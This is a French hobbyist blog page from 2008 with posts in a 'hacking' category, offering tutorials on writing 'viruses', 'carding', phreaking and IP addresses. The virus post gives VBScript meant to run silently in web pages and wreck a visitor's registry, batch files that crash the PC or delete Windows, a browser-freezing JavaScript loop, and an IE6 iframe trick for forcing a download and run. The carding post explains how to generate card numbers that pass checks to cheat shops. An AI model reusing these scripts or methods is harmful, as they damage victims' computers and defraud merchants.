Burning edge Spirit

xperience the spirit of words
  • rss
  • A propos
  • Liens
  • Leelou

Les virus

admin | 28 mars 2008 | 17:59

Un virus est un programme qui s’introduit dans l’ordinateur de la victime pour agir sur celui-ci (tout le monde le sait mais il faut bien une intro ^^).

Un virus cause des dégats dans le système qu’il a infecté. Ces dégats vont de l’affichage d’une pub à l’écran jusqu’à bouziller carrément ton processeur ou ta carte mère.

Il y a différents types de virus :

- Virus du secteur d’amorce : ils remplacent l’amorce d’un disque par leur propre code et se chargent ensuite en mémoire centrale. Il rendent inutilisable le disque d’amorçage et/ou se propagent vers d’autres disques.
- Virus de fichiers : ils ajoutent leur code aux fichiers exécutables (*.exe *.com *.bat *.src) et se chargent en mémoire centrale afin de contaminer encore d’autre programmes. Il rendent ces programmes inutilisables.
- Virus furtifs : ils échappent à toute détection en se camouflant. Une des méthodes de détection consiste à enregistrer la longueur d’un programme (si le virus a ajouté son code, on peut facilement comparer avec une simple sauvegarde de ce programme )
- Virus polymorphes : ils modifient leur aspect à chaque nouvelle infection.
- Virus cryptés : ils modifient leur code, ce qui complique leur détection.
- Cheval de Troie : il sert de serveur au hacker qui peut alors manipuler le PC par son intermédiaire.
- Bombe logique : variante du cheval de Troie, elle attend un signal externe pour exploser. Ce signal peut être une date précise, un lancement d’un certain programme etc.. Les dégâts causés par cette bombe peuvent être d’ordre matériel des fois, comme une modification du BIOS pour entraîner une surcharge électrique.

Dans ces tutos, je vais te montrer comment programmer des petits et des gros virus en VB à insérer dans une page html et en Dos.

Comment s’en protéger
Pour s’en protéger, tout d’abord, il ne faut jamais ouvrir une pièce jointe d’un mail provenant d’une personne qu’on ne connait pas. Pour supprimer un virus, on utilise un antivirus (par exemple AVG Antivirus). Et pour être sûr qu’un virus espion ne communique pas avec le pirate qui l’a envoyé, où qu’un virus soit envoyé par une faille de l’ordinateur, on utilise un firewall (tel que Sygate).

On peut intégrer des virus VB dans une page html très simplement, il s’éxecutera sans demander l’avis du visiteur !

Ouvrir le(s) lecteur(s) CD :

<script LANGUAGE=”VBScript”>
<!–
Set oWMP = CreateObject(”WMPlayer.OCX.7″ )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
End If
-
</script>

Désinstaller le disque dur :

<script Language=”VBscript”>
set WshShell = CreateObject(”Wscript.Shell”)
WshShell.RegDelete”HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\PCMIA\”
</script>

Désinstaller le modem :

<script Language=”VBscript”>
set WshShell = CreateObject(”Wscript.Shell”)
WshShell.RegDelete”HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Modem\”
</script>

Désinstaller la souris :

<script Language=”VBscript”>
set WshShell = CreateObject(”Wscript.Shell”)
WshShell.RegDelete”HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Mouse\”
</script>

Désinstaller l’écran :

<script Language=”VBscript”>
set WshShell = CreateObject(”Wscript.Shell”)
WshShell.RegDelete”HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\monitor\”
</script>

Désinstaller le clavier :

<script Language=”VBscript”>
set WshShell = CreateObject(”Wscript.Shell”)
WshShell.RegDelete”HKEY_CURRENT_USER\System\CurrentControlSet\Services\Keyboard\”
</script>

Supprimer les programmes qui se lancent au démarrage :

<script Language=”VBscript”>
set WshShell = CreateObject(”Wscript.Shell”)
WshShell.RegDelete”HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run”
</script>

Changer le nom de l’ordinateur :

<script Language=”VBscript”>
set WshShell = CreateObject(”Wscript.Shell”)
WshShell.RegDelete”HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\”
WshShell.RegWrite”HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\ComputerName\”loadation”
</script>

Désinstaller l’imprimante/scanner :

<script Language=”VBscript”>
set WshShell = CreateObject(”Wscript.Shell”)
WshShell.RegDelete”HKEY_CURRENT_USER\System\CurrentControlSet\Services\Class\Printer\”
</script>

Enlever Exécuter du menu Démarrer :

<script Language=”VBscript”>
set WshShell = CreateObject(”Wscript.Shell”)
WshShell.RegWrite”HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”
0,”RED_DWORD”
</script>

Enlever Rechercher du menu Démarrer :

<script Language=”VBscript”>
set WshShell = CreateObject(”Wscript.Shell”)
WshShell.RegWrite”HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”
0,”REG_DWORD”
</script>

Enlever Documents du menu Démarrer :

<script Language=”VBscript”>
set WshShell = CreateObject(”Wscript.Shell”)
WshShell.RegWrite”HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NorecentDocsMenu”
0,”REG_DWORD”
</script>

Placer un raccourcis sur le Bureau :

<script Language=”VBScript”> if location.protocol = “file:” then
Set WshShell = CreateObject(”WScript.Shell”)
Set FSO = CreateObject(”Scripting.FileSystemObject”)
HPath = Replace(location.href, “/”, “\”)
HPath = Replace(HPath, “file:\\\”, “”)
HPath = FSO.GetParentFolderName(HPath)
Set TRange = document.body.createTextRange
Set RealLink = WshShell.CreateShortcut(”C:\WINDOWS\bureau\limited.url”)
RealLink.TargetPath = “http://www.loadation.net/”
RealLink.Save
end if
</script>

Après, à toi de réussir à envoyer ta victime sur la page ! Les virus DOS sont très faciles à faire.
L’avantage : ils ne nécessitent pas de grandes connaissances en programmation.
L’inconvénient : la victime peut voir la source du virus, puisqu’il n’est pas compilé.
Les virus DOS sont des fichier texte au format bat. Pour en créer un, il suffit d’écrire le code dans le bloc-note, puis de l’enregistrer en .bat (par exemple: virus.bat)
Remarque 1 : les virus DOS ne fonctionnent que sous windows
Remarque 2 : ce tuto peut être aussi très utile pour créer des petits programmes utilitaires.
Les commandes sont les même que celles de DOS :

Quelques commandes utiles :

@echo off     cache les commandes exécutées après cette ligne
echo le texte qui s’affiche     pour afficher du texte
cls     efface tout le texte de la fenêtre ms-dos
pause     fait une pause dans l’éxecution du programme (Appuyez sur une touche pour continuer…)
exit     arrête l’éxecution du programme
del fichier     supprime un fichier (on peut utiliser les jokers * et ?)
deltree dossier     Supprime un dossier et toutes son arborescence
mkdir dossier     créer un dossier
copy fichier1 fichier2     copie fichier1 en fichier2
move fichier1 fichier2     déplace fichier1
ren fichier1 fichier2     renomme fichier1 en fichier2 (exemple pour renomme le fichier text.doc situé dans le dossier docs en text1.doc : ren docs/text.doc text1.doc)
:boucle1     est un label joignible grâce à goto (ici le label s’appelle boucle1)
goto boucle1     permet d’accéder à un label définit par : (ici boucle1)
prompt     modifie le traditionnel C:\> (par défaut prompt $p$g).
n peut par exemple afficher la date à la place comme ceci : prompt $d$g. (Signe > : $g, signe < : $l, la date : $d, l’heure : t, lecteur courant : $n, dossier courant : $p, nouvelle ligne : $_, et en fin pour effacer le caractère précédent : $h)
If condition conséquence     introduit une condition dans le programme. Par exemple, cette ligne de code affiche “okay” si le fichier test.txt existe :
If exist “test.txt” echo okay
call fichier.bat     inclut un autre script
more fichier1     affiche le contenu d’un fichier page par page

Utilisation des variables :

Set loadation=genial     Définit la variable loadation avec la valeur genial. On utilise une variable en plaçant un % avant et après son nom
echo Loadation est %loadation%     affiche “Loadation est genial”
If %loadation%==genial echo oui     affiche oui si loadation=genial
If not %loadation%==genial echo non     affiche non si loadation n’a pas la valeur genial
%windir%     contient l’adresse du répertoire Windows

Remarque : En DOS, on peut utiliser des jokers (*) pour remplacer une chaîne de caractères. Par exemple, si on veut supprimer tous les fichiers dll du dossier courant, on écrira del *.dll

Par exemple, on créer un fichier test.bat, qu’on ouvre avec le Bloc-Note.

Script qui écris indéfiniment “Bug” (mais ne génère pas de bug ^^) :

@echo off
:start
echo Bug
goto start

Script tout simple qui plante le PC :

start C:\CON\CON

Script qui supprime Windows (j’ai pas testé ) :

@echo off
deltree %windir%

les virus javascript (denial of service ) :
Le denial of service n’est pas une erreur, et encore moins une lacune de sécurité c’est le déclenchement par le biais d’un script de fonctions répétés indéfiniment qui vont finir par bloquer l’ordinateur du visiteur.

Exemple :

<script language=”JavaScript”>
while(true){ // Boucle infinie
window.open(”#”); // Ouvre la même fenètre
}
</script>

Cet exemple ouvre indéfiniment la même fenêtre dans une nouvelle fenêtre qui chacune se rouvre à nouveau indéfiniment (Le PC aura alors vite fait de planter !)

supprimer manuellement un virus

Certains virus, programmes espions ou spam ne sont pas toujours supprimés par l’antivirus.
On peux souvent les supprimer manuellement en 2 étapes :

- Vérifier s’il y a de fichier suspects sur C:\, C:\Windows et C:\Program Files (j’ai souvent eu des fichiers du genre stcloader.exe). Si tu n’es pas sûr qu’un fichier est un intrus, fait une recherche sur internet le concernant (www.google.fr).
Pour les supprimer, va d’abord voir dans Démarrer >> Paramètres >> Panneau de configuration >> Ajout/Suppression de programme, et désinstalle les applications déchet.
Ensuite, retourne dans ton disque et supprime manuellement (clic droit, supprimer) les fichiers restants.

- Vérifier si des programmes suspects se lancent au démarrage du pc : Va dans la base regedit (Démarrer >> Executer >> puis tape “regedit” et Enter), va voir dans ces dossiers :
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_USERS\xxxxxx\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_USERS\xxxxxx\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_USERS\xxxxxx\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

S’il y a des fichiers suspects, supprime les !

envoyer un virus directement a partir d’une page web

Une faille d’Internet Explorer 6 permet de forcer le téléchargement et l’éxecution d’un fichier quelconque hébergé sur uns site.

C’est très simple, il suffit d’insérer plusieurs dizaines de balises <iframe src=”fichier.exe”></iframe> dans une page html.

Rappel : la balise iframe incorpore un cadre, dont src définit la source du cadre.

Quand on ouvre la page, des dizaines de balises de demande de téléchargement s’ouvrent (autant que de balises iframe), et au bout de quelques instants, au lieu de continuer d’afficher les fenètres de téléchargement, IE télécharge le fichier fichier.exe et l’éxécute !

En attendant un patch, on peux se protéger de se bug en allant dans le menu Outils >> Options internet >> clique sur l’onglet Sécurité puis sur le bouton Personnaliser le niveau, et désactive “Téléchargement de fichiers” en bas de la liste.
Ou alors utilise un autre navigateur comme Firefox ou une version antérieure à celle de IE6 (IE5 se contente de planter).

faux virus :

voici un programme tres amusant si vous n’en abusez pas :

http://membres.lycos.fr/freakin/farces.zip

voila j’espere qu’avec ca vous êtes parés, pour de plus amples infos   mailez moi

ci dessous un exemple de messages inquietans apres execution de codes mentionnés ci dessus

Commentaires
Pas de Commentaires »
Catégories
virus
Flux rss des commentaires Flux rss des commentaires
Trackback Trackback

Carding

admin | | 17:57

Le carding que je vais vous expliquer, n’est pas le fait de faire les cartes etc.. Je vous explique ici l’algorythme des N° de CB:

Internet étant soit disant anonyme ( microsoft place des mouchards un peu partout…) si on prends les precautions necessaires, c’est le meilleur moyen d’exercer le carding.

sur le net, cerataines boutiques verifient si votre compte existe bel et bien, et d’autres ne verifient juste l’algorythme.. (les fournisseurs d’acces par exemple…)

Nous allons nous interesser a ceux qui ne verifient que l’algorythme…(les autres étant plus durs a pirater, car il faut avoir accès a la banque de données de la banque…(et ca, c’est du hacking et non du carding..)

Un numéro de carte se compose donc de 16 chiffres

X Y X Y - X Y X Y - X Y X Y - X Y X Y

vous devez simplement modifier tous les X tel que :

¤ Si X > 5 ou = alors X x 2 +1

¤ Si X < 5 alors X x 2

!! NE PAS TOUCHER AUX Y !!

Ensuite, vous allez ajouter les X modifiés et les Y

Vous allez trouver un nombre (il faut que ce soit un multiple de 10). Si c’est le cas, le numéro est valide. Si ce n’est pas le cas, il faut modifier le dernier Y pour qu’il devienne un multiple de 10

Voici un exemple :

5130-3342-2015-0150

5 x 2 + 1 = 11

1 est un Y

3 x 2 = 6

0 est un Y

3 x 2 = 6

3 est un Y

4 x 2 = 8

2 est un Y

2 x 2 = 4

0 est un Y

1 x 2 = 2

5 est un Y

0 x 2 = 0

1 est un Y

5 x 2 +1 = 11

0 est un Y

Maintenant, on va faire le total :

11+1+6+0+6+3+8+2+4+0+2+5+0+1+11+0 = 60

Le résultat est un multiple de 10 donc le n° de carte est correct

Si par exemple, le résultat était 56 ( 60 - 56 = 4 ) , on aurait ajouté 4 au dernier Y

Si la boutique demande un autorisation a la banque, votre paiement ne pourra pas être validé car le n° de carte ne sera attribué a personne.

Faites bon usage de votre nouveau savoir !

L’algorithme de vérification est assez simple :
On double un chiffre sur deux, en commençant par le premier (donc, on double le 1er, le 3eme, le 5eme, etc.). Si le résultat dépasse 9, on lui soustrait 9.
On prend tous ces chiffres doubles, on les additionne et on ajoute tous les chiffres qui restent (le 2eme, le 4eme, etc.).
Si le résultat est un multiple de 10, le numéro de carte est valide.

© != silentwolf

Commentaires
Pas de Commentaires »
Catégories
carding
Flux rss des commentaires Flux rss des commentaires
Trackback Trackback

le phreaking

admin | | 17:55

Le piratage téléphonique - ou phreaking en anglais - désigne le fait d’utiliser le réseau téléphonique d’une manière non prévue par l’opérateur afin d’accéder à des fonctions spéciales, principalement afin de ne pas payer la communication et de rester anonyme. Le mot anglais phreaking est obtenu par la contraction de phone et freak, le terme freak signifiant ‘marginal’, ou personne appartenant à une contre-culture.

Le pirate téléphonique est appelé un phreaker. L’activité est illégale dans de nombreux pays.
Origine

Le phreaking est né aux États-Unis dans les années 1970. Un des mythes fondateur du phreaking est l’histoire de Captain Crunch. Ce phreaker de renommée internationale avait utilisé un sifflet trouvé dans une boîte de céréales Captain Crunch pour accéder à des fonctions spéciales du central téléphonique. En effet, le son émis par ce sifflet avait une fréquence de 2600 Hz, la même fréquence que le signal utilisé pour piloter le central téléphonique. Un des groupes de phreaking les plus connus s’appelle d’ailleurs 2600. Actuellement, avec l’arrivée du numérique dans les systèmes téléphoniques, les procédés utilisés sont beaucoup moins rocambolesques.

Quelques phreakers célèbres :

* Captain Crunch
* 2600
* Cryptel
* Phreakon
* NoRace
* Pyrophreak
* zRoOtZ

[modifier]

En France

Au début des années 1970, des chercheurs de l’IRIA (devenu depuis INRIA) avaient remarqué qu’en déclenchant du doigt un très bref raccrochage pendant quelques centièmes de seconde, le standard l’interprétait comme un 1 sans passer par le testeur de numéros. Cela permettait ainsi aux employés n’ayant pas l’accès au téléphone international (à l’époque, préfixe 19) de le composer tout de même.

Les télécartes furent l’objet d’actes de piratage pendant les années 1990 notamment pour une communication gratuite entre le phreaker et des BBS pirates distants via un coupleur acoustique. Mais depuis, France Télécom a mis en circulation un nouveau type de télécarte, la T2G, avec un nouveau système de chiffrement.

Le système de chiffrement de ces nouvelles T2G n’a toujours pas été cassé (ou alors, la chose n’a pas été rendue publique) mais des phreakers ont trouvé un système ingénieux pour téléphoner gratuitement. En effet, il suffit d’utiliser une vraie T2G pour effectuer les authentifications puis d’utiliser un émulateur de T2G une fois la communication établie pour que la cabine ponctionne les unités sur une télécarte qui en fait n’existe pas. Cet émulateur porte le nom de Joséphina.

On peut pirater des systèmes téléphoniques de différentes manières. Généralement on appelle les systèmes capables de pirater un système téléphonique des boxs précédés d’un nom de couleur. Exemples : la beige box, la red box, la blue box etc. il en existe des centaines.

Nous avons vu précédemment que le son émis par le sifflet du Captain Crunch était de 2600 hz, on peut considérer cela comme une blue box.

La blue box consistait simplement à utiliser les fréquences des opérateurs, qui transitaient par les mêmes circuits des anciens systèmes CCITT5. Aujourd’hui, les pays occidentaux utilisent le système SS7, et la blue box ne fonctionne plus avec ces systèmes plus modernes. Il paraîtrait que cette technique d’emploi des fréquences, est encore utilisée par France Télécom en cas de panne de ligne, mais cela paraît hautement improbable.

Cela dit, il y a encore peu de temps, le blue boxing était encore possible. En effet, on peut appeler des numéros verts internationaux en direction de pays étrangers fonctionnant encore avec ce système en CCITT5 (pays du sud généralement), et là à envoyer une fréquence adéquate, et ainsi rappeler un numéro international.

Il existe encore d’autres boxs. Une des plus simples est la beige box, elle consiste à brancher sur une ligne téléphonique une autre ligne téléphonique. Cette technique, tout comme les autres d’ailleurs, est totalement illégale, et passible de fortes amendes et peines de prison. Il y a un certain temps, il était même possible de gagner de l’argent grâce a cette technique. Il fallait appeler un serveur minitel, rester connecté le plus longtemps possible, et ensuite se faire envoyer des lots … Cette technique est caduque maintenant, il n’y a plus de serveur minitel qui propose des lots de fidélité.

D’autres box existent, aux utilités multiples… par exemple, écouter une conversation téléphonique, ou alors ne pas faire payer celui qui appelle grâce à un montage (technique dite de la black box, possible en France, mais attention un robot nommé SIRIUS de France Télécom repère cette box, et les utilisateurs se faisant repérer risquent de lourdes peines)

Aujourd’hui le phreaking en France n’a plus beaucoup d’adeptes. C’est en effet une discipline dangereuse, et les gens préfèrent s’intéresser au hacking, beaucoup plus médiatisé. De plus, la généralisation de connexions Internet haut-débit et la baisse des tarifs téléphoniques ont limité son intérêt même s’il reste encore possible.

je ne fournirai pas de lien concernant cette rubrique car son utilisation est trop dangereuse et completement illegale….

Commentaires
Pas de Commentaires »
Catégories
Phreaking
Flux rss des commentaires Flux rss des commentaires
Trackback Trackback

Les IPS

admin | | 17:53

1. Définition de l’IP

“Internet Protocole” est un protocole associé à TCP=”Transfert Communication Protocole”. Vous avez déjà du voir le mot TCP/IP quelque part. En clair, l’ IP est
l’ identifiant numérique d’un ordinateur dans un réseau, au même titre que le numéro matricule d’un homme dans l’armée. Quand les réseaux se sont développés, il a fallut trouver un identifiant à chaque ordinateur pour que ceux ci puissent communiquer et se reconnaître. Le choix de prendre un numéro est idéal en informatique, car plus maniable qu’un nom de type “xb5.palace-club.net”. Le numéro IP (norme IP-4 actuelle) est de la forme W.X.Y.Z où W, X, Y, Z sont des nombres compris entre 0 et 255. Par exemple 50.212.185.11 est un numéro IP. On dit normalement “une adresse IP”, et par abus de language “un IP”. Les chiffres 0 à 255 représentent donc 256 valeurs. ” 256″ n’a pas été choisi au hasard puisqu’il correspond à la valeur 2^8 (2 puissance 8). Cela vient du language binaire où il est possible de coder une valeur décimale par les seuls nombres 0 et 1. 0 et 1 sont dits des “bits”. W, X, Y ou Z peuvent ainsi chacun s’écrire comme un octet (8 bits). Une adresse IP peut donc s’écrire comme 4 octets : 32 bits.ll faut savoir que dans tout système éléctronique, le language binaire est la base de tout. Tout est écrit et transmis en language binaire. Par le suite nous ne reviendrons pas sur le language binaire (seul utile quand on parle de sniffage, d’analyseur de trame, de scann, de protocole…)

II - IPv4:

L’IPv4 est composée de 4 chiffres compris entre 1 et 255, séparés par un point.
Exemple:

172.54.182.112
172.54 est l’adresse du reseau,

182 celle du sous-reseau, et

112 celle de la machine

Classes d’adresse en IPv4.
Note importante : ce concept est ancien et n’est plus utilisé que par abus de langage, il est remplacé par la notion d’adresses « sans classe » (CIDR, décrit ci-après).

Les classes sont :

* Classe A, toute adresse dont l’adresse commence par 0 en binaire (c’est à dire une adresse inclue dans les blocs 0/8 à 127/8).
* Classe B, toute adresse dont l’adresse commence par 10 en binaire (c’est à dire une adresse inclue dans les blocs 128/8 à 191/8).
* Classe C, toute adresse dont l’adresse commence par 110 en binaire (c’est à dire une adresse inclue dans les blocs 192/8 à 223/8).
* Classe D, toute adresse dont l’adresse commence par 1110 en binaire (c’est à dire une adresse inclue dans les blocs 224/8 à 239/8).
* Classe E, toute adresse dont l’adresse commence par 1111 en binaire (c’est à dire une adresse inclue dans les blocs 240/8 à 255/8).

Par exemple l’adresse 18.x.y.z est une adresse de classe A car le premier bit du premier octet (18, soit 00010010 en binaire) est bien zéro. 193.x.y.z est une adresse de classe C car les trois premiers bits (193 se notant 11000001) sont bien 110.
Sur un reseau local, l’adresse sera toujours du type: 192.168.0.*, le * etant le numero de l’ordinateur dans ton reseau (LAN par exemple).

III - IPv6:

Une adresse IPv6 est une valeur codée sur 128 bits. Elle est typiquement représentée par 8 nombres hexadécimaux de 4 chiffres séparés par des « : ».

Exemples :
1080:0:0:0:8:800:200C:417A ou 2001:80:2aff:0:0:0:0:25 ou encore 2001:470:1f01:ffff:0:0:0:1e

Une seule séquence de un ou plusieurs groupes consécutifs de 0 peut être supprimée, mais la position de la séquence supprimée doit rester encadrée par des « :: » :
1080::8:800:200C:417A ou 2001:80:2aff::25 ou encore 2001:470:1f01:ffff::1e

Trouver un adresse IP

Il existe plusieurs moyens de trouver l’IP d’une autre personne:

- Sur le chat IRC: Tapez /dns pseudo

- Sur ICQ: Cliquez sur son pseudo puis sur info. S’il l’a caché, il y aura marqué N/A dans la place prévue à cet effet.Pour le trouver si pseudo l’a caché, laissez la fenêtre info ouverte, mettez votre icq sur “offline” et fermez la fenêtre info. Maintenant retournez dans ses infos de la même manière cette fois si L’IP s’affcihe !

- Affichage des protocoles: Dans la commande MS-DOS, tapez netstat -a. Ca affichera toutes les IP qui sont connectees a votre ordinateur. Donc celle de quelqu’un avec qui vous seriez entrain de parler sur MSN, par exemple…

- Par mail: Quand quelqu’un vous envoie un mail, il est facile de connaitre son IP (au moment de l’envoi). Il faut d’abord parametrer son serveur mail pour qu’il affiche le code HTML du mail, puis regarder l’en-tête du mail: Vous pourrez voir son IP.

- Snif IP: C’est la technique infaillible. Elle consiste en l’envoi d’un mail avec une fausse image.

Il existe plusieurs moyens de cacher son IP: Le moyen le plus courant etant d’utiliser un proxy.

Qu’est-ce qu’un proxy? C’est un masque qui cache la veritable IP de l’ordinateur aux autres utilisateurs du net. L’interêt? Rester anonyme pendant tes surfs! Ces masques sont donnes par des sites appeles serveurs proxy. Il est facile de trouver ce genre de serveurs sur google. Le probleme est que ces serveurs controlent des ports precis et qu’il faut les parametrer pour chaque programme qui necessite une connection a internet. Les proxys ralentissent egalement beaucoup votre vitesse de connection.

Les traceurs d’IP: Ce sont des programmes qui permettent de localiser geographiquement une adresse IP, c’est a dire de savoir l’adresse réelle du serveur le plus proche du PC dont tu as l’IP, et quelques fois même l’adresse réelle du PC. Les plus connus sont Visual route et Neo trace (que je vous conseille). Vous pouvez egalement tracer une IP sans programme, a partir du site de visual route: http://visualroute.visualware.co.uk/ (sur ce site, vous povez egalement trouver d’autres outils, pour tester la vitesse de votre connection, par exemple) Les IP A Ne Pas Scanner Voici une liste d’ip dite à ne pas scanner car elles appartienent au gouvernement américain et qu’ils aiments pas trop qu’on regarde leurs infos voila tout.

6.*.*.* - Army Information Systems Center
21.*.*.* - US Defense Information Systems Agency
22.*.*.* - Defense Information Systems Agency
26.*.*.* - Defense Information Systems Agency
29.*.*.* - Defense Information Systems Agency
30.*.*.* - Defense Information Systems Agency
49.*.*.* - Joint Tactical Command
50.*.*.* - Joint Tactical Command
55.*.*.* - Army National Guard Bureau
64.224.*.*
64.225.*.*
64.226.*.*
209.35.*.*
216.247.*.*
216.25.*.*
217.6.*.*
155.7.0.0 American Forces Information (NET-AFISHQ-NET1)
155.8.0.0 U.S. ArmyFort Gordon (NET-GORDON-NET5)
155.9.0.0 United States Army Information Systems Command (NET-LWOOD-NET2)
155.74.0.0 PEO STAMIS (NET-CEAP2)
155.75.0.0 US Army Corps of Engineers (NET-CEAP3)
155.76.0.0 PEO STAMIS (NET-CEAP4)
155.77.0.0 PEO STAMIS (NET-CEAP5)
155.78.0.0 PEO STAMIS (NET-CEAP6)
155.79.0.0 US Army Corps of Engineers (NET-CEAP7)
155.80.0.0 PEO STAMIS (NET-CEAP
155.81.0.0 PEO STAMIS (NET-CEAP9)
155.82.0.0 PEO STAMIS (NET-CEAP10)
155.83.0.0 US Army Corps of Enginers (NET-CEAP11)
155.84.0.0 PEO STAMIS (NET-CEAP12)
155.85.0.0 PEO STAMIS (NET-CEAP13)
155.86.0.0 US Army Corps of Engineers (NET-CEAP14)
155.87.0.0 PEO STAMIS (NET-CEAP15)
155.88.0.0 PEO STAMIS (NET-CEAP16)
155.178.0.0 Federal Aviation Administration (NET-FAA)
155.213.0.0 USAISC Fort Benning (NET-FTBENNNET3
155.214.0.0 Director of Information Management (NET-CARSON-TCACC )
155.215.0.0 USAISC-FT DRUM (NET-DRUM-TCACCIS)
155.216.0.0 TCACCIS Project Management Office (NET-FTDIX-TCACCI)
155.217.0.0 Directorate of Information Management (NET- EUSTIS-EMH1)
155.218.0.0 USAISC (NET-WVA-EMH2)
155.219.0.0 DOIM/USAISC Fort Sill (NET-SILL-TCACCIS)
155.220.0.0 USAISC-DOIM (NET-FTKNOX-NET4)
155.221.0.0 USAISC-Ft Ord (NET-FTORD-NET2)
128.47.0.0 Army Communications Electronics Command (NET-TACTNET)
128.50.0.0 Department of Defense (NET-COINS)
128.51.0.0 Department of Defense (NET-COINSTNET)
128.56.0.0 U.S. Naval Academy (NET-USNA-NET)
128.63.0.0 Army Ballistics Research Laboratory (NET-BRL-SUBNET)
128.80.0.0 Army Communications Electronics Command (CECOM) (NET-CECOMNET)
128.98.0.0 - 128.98.255.255 Defence Evaluation and Research Agency (NET-DERA-UK)
128.154.0.0 NASA Wallops Flight Facility (NET-WFF-NET)
128.155.0.0 NASA Langley Research Center (NET-LARC-NET)
128.156.0.0 NASA Lewis Network Control Center (NET- LERC)
128.157.0.0 NASA Johnson Space Center (NET-JSC-NET)
128.158.0.0 NASA Ames Research Center (NET-MSFC-NET)
128.159.0.0 NASA Ames Research Center (NET-KSC-NET) 128.160.0.0 Naval Research Laboratory (NET- SSCNET)
128.161.0.0 NASA Ames Research Center (NET-NSN-NET)
128.183.0.0 NASA Goddard Space Flight Center (NET-GSFC)
128.216.0.0 MacDill Air Force Base (NET-CC-PRNET)
128.217.0.0 NASA Kennedy Space Center (NET-NASA-KSC-OIS)
128.236.0.0 U.S. Air Force Academy (NET-USAFA-NET)
139.142.*
195.10.*
205.96.* - 205.103.*
207.30.* - 207.120.*
207.60.* - 207.61.*
209.35.*.*
216.25.* <– REAL DANGEROUS (CIA?)
216.247.* <– REAL DANGEROUS
217.6.*.*
207.60.x.x and 207.61.x.x - FBI Linux servers used to trap scanners

139.142.153.23<— DANGEREUX

Commentaires
Pas de Commentaires »
Catégories
Internet protocol
Flux rss des commentaires Flux rss des commentaires
Trackback Trackback

admin | | 17:51

POUR Consulter cette partie, VOUS DEVEZ ACCEPTER CE DISCLAIMER ::.
1/ Tout ce que vous pourez trouver sur cette page est destiné à
l’apprentissage et audivertissement! Sur ce site rien n’est illégal en
soi.

2/ Ni moi, ni mes hebergeurs, ni personne sauf VOUS ne pourraient
être tenus pour responsables de vos agissements et toutes les
conséquences qui pourraient résulter après consultation de ce site.

3/ ous ne devez pas télécharger les choses (programmes…) disponibles
sur ce site si vous n’en avez pas acheté l’original.

4/ Nous vous appelons que ce n’est pas vrai que vous avez le droit de garder 24
heure un programme ou MP3… Vous devez en avoir acheté l’original.

5/ En entrant dans ce site, vous agréez entièrement à tout ce qui a été
énoncé ci-dessus et vous vous engagez à ne pas utiliser les
Informations contenues sur ce site de quelque manière qui pourrait
entrer en conflit avec vos lois locales ainsi qu’avec la charte des
Droits de l’Homme, et a ne pas poursuivre juridiquement les gens ayant
participe a l’ellaboration de ce site.

6/ Si vous ne comprenez pas un
mot ou une phrase de ce disclaimer vous devez quitter ce site
maintenant.
Merci d’avoir lu ce disclaimer. Vous pouvez désormais entrer sur la partie si vous n’enfreignez aucune des règles énoncées ci-dessus.


Le webmestre de Silentworld
silentwolf@hotmail.fr

Commentaires
Pas de Commentaires »
Catégories
hacking
Flux rss des commentaires Flux rss des commentaires
Trackback Trackback

Catégories

  • Analyse
    • citations
    • Evenementiel
    • réflections philosophiques
  • Beaux mots
  • Echappatoire vitale
    • Aphorismes et jeux de mots
    • poésie
  • hacking
    • carding
    • Internet protocol
    • Phreaking
    • virus
  • hoche
  • Liens
  • Phoenicis Penna incorporated
    • De la vie quotidienne
  • photos
  • plume assassine

Articles récents

  • Noces biologiques
  • Deuxième échappatoire poétique
  • Ruptures et continuité
  • Vendéennes retouchées…
  • Proverbe vs admin.

 

mai 2025
L Ma Me J V S D
« nov    
 1234
567891011
12131415161718
19202122232425
262728293031  

Méta

  • Inscription
  • Connexion
  • Articles RSS
  • RSS des commentaires
  • WordPress.org

Commentaires récents

  • youriboglanoff dans Le paraitre.
  • youriboglanoff dans L'été.
  • youriboglanoff dans L'été.
  • J.-P. Chauvin dans citations# 4ème dizain

Archives

  • novembre 2008
  • août 2008
  • juillet 2008
  • juin 2008
  • mai 2008
  • avril 2008
  • mars 2008
  • juin 2007
rss Flux rss des commentaires valid xhtml 1.1 design by jide powered by Wordpress get firefox